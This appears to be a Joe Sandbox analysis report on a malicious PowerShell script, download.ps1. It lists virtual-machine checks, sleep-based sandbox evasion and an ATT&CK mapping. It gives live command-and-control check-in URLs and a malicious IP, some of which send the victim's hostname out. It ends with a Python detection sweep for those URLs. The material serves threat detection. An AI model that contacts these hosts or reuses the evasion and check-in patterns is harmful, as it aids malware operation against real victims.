Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1797817107.0000022F3B066000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B76D2A5 pushad ; iretd 0_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B95D114 push eax; iretd 0_2_00007FFD9B95D115
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAF7163 push edi; iretd 0_2_00007FFD9BAF7166
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAF0D5C pushad ; ret 0_2_00007FFD9BAF0D5D

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3911
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (4 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic column; a number in parentheses is the count the report attaches to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (121); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
download.ps1 | 8% | ReversingLabs | |
download.ps1 | 16% | Virustotal | | Browse
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://crl.microsoft& | 0% | Avira URL Cloud | safe |
http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527 | 0% | Avira URL Cloud | safe |
http://kcehmenjdibnmni.top | 0% | Avira URL Cloud | safe |
http://0.google.com/ | 0% | Avira URL Cloud | safe |
http://0.google. | 0% | Avira URL Cloud | safe |
https://0.google | 0% | Avira URL Cloud | safe |
http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 | 0% | Avira URL Cloud | safe |
https://0.google.com/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.185.164 | true | false | | high
kcehmenjdibnmni.top | 45.61.136.138 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527 | true | Avira URL Cloud: safe | unknown
http://www.google.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_ | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPage | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24B02000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://0.google.com/ | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft& | powershell.exe, 00000000.00000002.1796525489.0000022F3AAE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schema.org/WebPageX | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com | powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://kcehmenjdibnmni.top | powershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://0.google | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://0.google. | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527 | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngX | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://0.google.com/ | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png | powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.164 | www.google.com | United States | 15169 | GOOGLE (US) | false
45.61.136.138 | kcehmenjdibnmni.top | United States | 40676 | AS40676 (US) | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584337
Start date and time: 2025-01-05 08:43:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal76.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .ps1
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7356 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big: too many NtCreateKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:44:02 | API Interceptor | 41x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kcehmenjdibnmni.top/mra3hxz5j7htr.php?id=user-PC&key=48227644320&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527
45.61.136.138 | download.ps1 | malicious | Unknown | kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527
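The ten check-in URLs above share one shape: a 15-letter .top host, a 10-character [a-z0-9] token followed by "htr.php", and exactly the query parameters id (hostname), key (a long decimal) and s=527. The following Python is an added example, not part of the Joe Sandbox report, that turns that shape into a proxy-log sweep. The log format ("<time> <src_ip> <method> <url> <status>") and the benign filler lines are constructed for the example; the four check-in URLs in it are copied from the table. The host and path regexes are deliberately as tight as the observed shape, so they will not fire on the next campaign if the operator changes the token length or TLD.

```python
"""Flag TA582/KongTuke-style check-in URLs in proxy log lines."""
import re
from urllib.parse import urlsplit, parse_qs

# Shape taken from the report's IP-context table: 15 lowercase letters + ".top",
# a 10-char [a-z0-9] token ending in "htr.php", and exactly the id/key/s parameters.
CHECKIN_HOST = re.compile(r"^[a-z]{15}\.top$")
CHECKIN_PATH = re.compile(r"^/[a-z0-9]{10}htr\.php$")


def parse_checkin(url):
    """Return {'host','id','key','s'} if url matches the check-in shape, else None."""
    if "://" not in url:                 # the report lists the URLs without a scheme
        url = "http://" + url
    parts = urlsplit(url)
    if not CHECKIN_HOST.match(parts.hostname or ""):
        return None
    if not CHECKIN_PATH.match(parts.path):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if set(qs) != {"id", "key", "s"}:
        return None
    key, s = qs["key"][0], qs["s"][0]
    if not (key.isdigit() and s.isdigit()):
        return None
    return {"host": parts.hostname, "id": qs["id"][0], "key": key, "s": s}


# Constructed proxy log (not from the report): "<time> <src_ip> <method> <url> <status>".
# The four .top check-in URLs are copied from the report; the other lines are benign filler
# chosen to exercise the negative cases (wrong host length, wrong path, unrelated domains).
SAMPLE_LOG = """\
08:44:07 192.168.2.4 GET http://kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527 200
08:44:09 192.168.2.4 GET http://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png 200
08:45:02 192.168.2.7 GET http://kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527 200
08:45:30 192.168.2.7 GET https://aka.ms/pscore68 302
08:46:11 192.168.2.9 GET http://kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527 200
08:46:40 192.168.2.9 GET http://example.top/abcdefghijhtr.php?id=x&key=1&s=2 200
08:47:00 192.168.2.9 GET http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 200
08:47:05 192.168.2.9 GET http://kdemjgebjimkanl.top/index.php?id=user-PC&key=1&s=527 200
"""


def scan_log(text):
    """Return one (src_ip, parsed_fields) tuple per log line whose URL is a check-in."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        parsed = parse_checkin(fields[3])
        if parsed:
            hits.append((fields[1], parsed))
    return hits


def infected_hosts(text):
    """Map each internal source IP that checked in to the set of C2 hosts it reached."""
    out = {}
    for src, p in scan_log(text):
        out.setdefault(src, set()).add(p["host"])
    return out


if __name__ == "__main__":
    for src, p in scan_log(SAMPLE_LOG):
        print(src, "->", p["host"], "id=%s key=%s s=%s" % (p["id"], p["key"], p["s"]))
```

For hunting rather than alerting, loosen CHECKIN_HOST and keep only the "htr.php" suffix plus the id/key/s parameter set; the value of id is the victim hostname, which is what you pivot on in the rest of the log.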
Match | Associated Sample Name / URL | Detection | Threat Name | Context
kcehmenjdibnmni.top | download.ps1 | malicious | Unknown | 45.61.136.138
